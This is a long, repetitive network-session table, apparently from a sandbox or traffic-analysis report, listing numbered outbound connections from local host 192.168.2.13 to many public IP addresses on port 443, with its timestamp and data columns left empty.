                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18393192.168.2.1354408134.235.69.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18394192.168.2.1348302218.52.17.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18395192.168.2.134231481.40.49.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18396192.168.2.135260878.37.70.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18397192.168.2.133797494.18.102.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18398192.168.2.133721472.235.27.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18399192.168.2.1348582175.77.4.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18400192.168.2.135645894.172.114.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18401192.168.2.1343366173.195.199.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18402192.168.2.1358084171.86.2.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18403192.168.2.135525485.251.54.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18404192.168.2.133786864.34.251.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18405192.168.2.135260843.175.76.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18406192.168.2.1345404108.154.137.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18407192.168.2.1336496153.7.124.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18408192.168.2.134761823.0.59.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18409192.168.2.1335230209.212.86.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18410192.168.2.1336454198.107.73.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18411192.168.2.134659037.29.52.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18412192.168.2.1351898149.126.192.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18413192.168.2.1353520141.242.25.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18414192.168.2.13603564.112.60.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18415192.168.2.1333480179.88.204.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18416192.168.2.1354030123.216.142.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18417192.168.2.135037459.4.35.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18418192.168.2.1359556171.221.151.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18419192.168.2.1338918164.244.131.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18420192.168.2.136077469.156.114.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18421192.168.2.13560885.22.19.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18422192.168.2.135845018.143.151.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18423192.168.2.13571989.146.126.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18424192.168.2.13381742.105.218.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18425192.168.2.133609458.145.130.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18426192.168.2.1340456120.120.1.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18427192.168.2.134562836.116.31.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18428192.168.2.1341424154.116.39.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18429192.168.2.1347480150.181.142.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18430192.168.2.1344278202.21.50.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18431192.168.2.134030065.40.182.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18432192.168.2.1339362223.190.34.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18433192.168.2.1351044186.86.55.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18434192.168.2.1360334198.89.26.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18435192.168.2.1342596198.179.255.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18436192.168.2.1352728147.161.55.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18437192.168.2.133445437.43.245.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18438192.168.2.1336348195.27.4.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18439192.168.2.1347020119.32.248.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18440192.168.2.133634049.215.105.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18441192.168.2.1358472132.76.130.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18442192.168.2.1341672222.240.46.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18443192.168.2.1341804132.122.179.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18444192.168.2.1353800147.157.239.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18445192.168.2.134328813.58.135.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18446192.168.2.1338122155.55.118.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18447192.168.2.134227277.45.25.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18448192.168.2.135471437.52.133.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18449192.168.2.134553857.103.251.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18450192.168.2.135187634.126.142.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18451192.168.2.136011062.194.152.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18452192.168.2.1339582181.62.25.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18453192.168.2.1355382217.129.30.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18454192.168.2.134180877.138.224.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18455192.168.2.134999825.180.103.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18456192.168.2.135489481.227.174.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18457192.168.2.1360646213.100.223.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18458192.168.2.1359274125.181.92.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18459192.168.2.1340926221.217.6.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18460192.168.2.135245840.224.114.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18461192.168.2.1354786175.102.127.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18462192.168.2.1345946102.234.27.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18463192.168.2.135126846.236.31.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18464192.168.2.1353278207.161.166.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18465192.168.2.1355040159.145.91.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18466192.168.2.1357746146.58.66.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18467192.168.2.1333936112.11.229.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18468192.168.2.1351898170.175.173.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18469192.168.2.1337472100.59.182.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18470192.168.2.1349656148.29.130.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18471192.168.2.1354958187.118.233.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18472192.168.2.1336814210.0.123.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18473192.168.2.133821860.112.146.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18474192.168.2.135921281.245.151.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18475192.168.2.133615291.225.47.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18476192.168.2.1360206158.157.12.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18477192.168.2.1338702145.236.122.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18478192.168.2.133612888.126.239.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18479192.168.2.134728638.140.83.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18480192.168.2.134774017.21.17.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18481192.168.2.1343952177.68.167.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18482192.168.2.133481671.204.232.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18483192.168.2.135075672.233.93.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18484192.168.2.1335756110.26.87.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18485192.168.2.1354782177.111.75.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18486192.168.2.1355700175.18.184.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18487192.168.2.133686239.15.159.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18488192.168.2.1359520113.233.175.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18489192.168.2.1350748194.192.128.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18490192.168.2.135939632.143.84.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18491192.168.2.1342644157.242.12.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18492192.168.2.134603088.245.67.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18493192.168.2.1340672178.2.59.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18494192.168.2.1343250141.240.15.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18495192.168.2.135082868.208.222.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18496192.168.2.1350572196.149.255.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18497192.168.2.1351626173.200.154.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18498192.168.2.1348200197.96.187.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18499192.168.2.1341454115.13.14.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18500192.168.2.1352848202.156.42.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18501192.168.2.133424685.82.45.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18502192.168.2.1353856207.29.199.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18503192.168.2.135324087.246.254.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18504192.168.2.133330658.104.164.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18505192.168.2.134291044.100.213.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18506192.168.2.1352414173.123.84.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18507192.168.2.135051042.53.155.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18508192.168.2.1347380216.165.83.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18509192.168.2.1338364153.188.78.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18510192.168.2.134212667.123.31.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18511192.168.2.1360000173.27.214.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18512192.168.2.13430865.254.34.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18513192.168.2.1344034167.201.57.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18514192.168.2.1359180188.75.16.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18515192.168.2.133476076.235.19.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18516192.168.2.135729658.97.142.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18517192.168.2.1337080104.115.54.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18518192.168.2.134892014.155.254.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18519192.168.2.134974084.79.2.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18520192.168.2.1358696129.16.46.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18521192.168.2.1337466158.58.148.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18522192.168.2.1352418157.181.242.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18523192.168.2.1343316148.57.53.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18524192.168.2.133591292.127.9.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18525192.168.2.1349062210.14.68.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18526192.168.2.1341254148.84.52.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18527192.168.2.133545473.24.143.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18528192.168.2.133919891.232.230.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18529192.168.2.1357552121.81.28.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18530192.168.2.1334454140.237.241.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18531192.168.2.1344404178.141.76.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18532192.168.2.1357186118.68.151.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18533192.168.2.1335512139.144.95.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18534192.168.2.1348390158.196.67.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18535192.168.2.1359582117.19.183.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18536192.168.2.135310288.221.83.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18537192.168.2.133869280.0.29.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18538192.168.2.1339314147.165.151.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18539192.168.2.1356538164.104.58.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18540192.168.2.1354932112.128.202.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18541192.168.2.1337156130.125.182.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18542192.168.2.1353430213.60.123.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18543192.168.2.1359524172.248.143.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18544192.168.2.1338348103.165.180.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18545192.168.2.1344778123.232.62.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18546192.168.2.1349504155.22.227.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18547192.168.2.1335820157.189.59.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18548192.168.2.134896682.33.7.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18549192.168.2.1359592114.77.66.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18550192.168.2.134415884.242.109.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18551192.168.2.1335612179.27.188.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18552192.168.2.1358664155.1.184.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18553192.168.2.134287865.169.73.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18554192.168.2.1337476209.50.85.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18555192.168.2.1345970212.131.139.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18556192.168.2.1347934191.211.153.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18557192.168.2.1336550176.156.72.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18558192.168.2.135633487.18.139.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18559192.168.2.1360974211.114.93.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18560192.168.2.1347140219.144.191.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18561192.168.2.1339504144.204.204.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18562192.168.2.1343230188.209.141.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18563192.168.2.1360184104.15.155.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18564192.168.2.1338292138.215.202.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18565192.168.2.133776670.33.201.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18566192.168.2.1333048132.194.157.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18567192.168.2.135747220.32.128.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18568192.168.2.135482654.144.67.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18569192.168.2.1352632189.225.67.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18570192.168.2.1346924121.158.40.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18571192.168.2.134523099.114.230.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18572192.168.2.1360596180.243.120.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18573192.168.2.1347762208.224.169.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18574192.168.2.133790896.240.55.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18575192.168.2.1352478161.69.172.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18576192.168.2.1345746150.215.152.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18577192.168.2.1337444211.140.160.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18578192.168.2.135388283.4.237.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18579192.168.2.134616252.27.27.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18580192.168.2.13375584.57.65.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18581192.168.2.134177090.249.178.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18582192.168.2.1349110158.95.254.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18583192.168.2.1334346169.57.99.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18584192.168.2.1354570118.44.204.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18585192.168.2.135795054.79.0.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18586192.168.2.134745866.179.177.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18587192.168.2.134582623.7.80.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18588192.168.2.134238627.77.208.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18589192.168.2.134473413.92.192.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18590192.168.2.13566384.213.15.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18591192.168.2.1348198137.171.185.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18592192.168.2.1344190106.201.91.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18593192.168.2.1333316219.243.168.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18594192.168.2.134114693.231.159.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18595192.168.2.1359188171.21.246.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18596192.168.2.135636491.24.119.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18597192.168.2.1345852170.169.113.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18598192.168.2.1339782171.102.221.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18599192.168.2.1348388204.75.109.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18600192.168.2.1358830141.49.89.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18601192.168.2.1338902206.150.0.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18602192.168.2.1337472146.31.54.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18603192.168.2.134273075.199.187.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18604192.168.2.134351827.102.182.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18605192.168.2.1357196112.74.106.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18606192.168.2.135938237.237.252.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18607192.168.2.133479263.122.230.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18608192.168.2.135656472.253.199.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18609192.168.2.134138494.200.14.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18610192.168.2.1360284126.218.89.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18611192.168.2.133586445.166.141.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18612192.168.2.135201025.55.184.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18613192.168.2.1360376132.17.16.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18614192.168.2.1335566121.119.127.38443
